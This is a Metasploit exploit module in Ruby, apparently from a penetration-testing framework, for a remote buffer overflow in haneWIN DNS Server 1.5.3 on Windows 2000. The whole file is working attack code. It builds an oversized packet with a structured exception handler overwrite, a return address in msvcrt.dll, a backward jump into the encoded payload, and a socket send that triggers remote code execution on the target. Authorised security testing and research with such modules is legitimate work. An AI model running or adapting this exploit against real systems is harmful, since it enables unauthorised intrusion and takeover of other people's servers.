1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 |
require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'haneWIN DNS Server Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability found in haneWIN DNS Server <= 1.5.3. The vulnerability is triggered by sending an overly long packet to the victim server. A memcpy function blindly copies user supplied data to a fixed size buffer leading to remote code execution. This module was tested against haneWIN DNS 1.5.3 }, 'Author' => [ 'james fitts' ], 'License' => MSF_LICENSE, 'References' => [ [ 'EDB', '31260' ], [ 'OSVDB', '102773' ] ], 'Privileged'=> false, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 1000, 'DisableNops' => true, 'BadChars' => "\x00\x0a\x0d\x20", 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'Platform' => 'win', 'DefaultTarget' => 0, 'Targets' => [ [ 'Windows 2000 SP4 EN / haneWIN DNS 1.5.3', { # msvcrt.dll v6.10.9844.0 # pop esi/ pop edi/ retn 'Ret' => 0x78010394, } ] ], 'DisclosureDate' => 'Jul 27 2013')) register_options([Opt::RPORT(53)], self.class) end def exploit connect p = make_nops(32) + payload.encoded buf = Rex::Text.pattern_create(5000) buf[0, 2] = [0x4e20].pack('n') # length for malloc buf[1332, p.length] = p buf[2324, 8] = generate_seh_record(target.ret) buf[2332, 15] = make_nops(10) + "\xe9\x13\xfc\xff\xff" # jmp $-1000 print_status("Sending malicious request...") sock.put(buf) disconnect end end |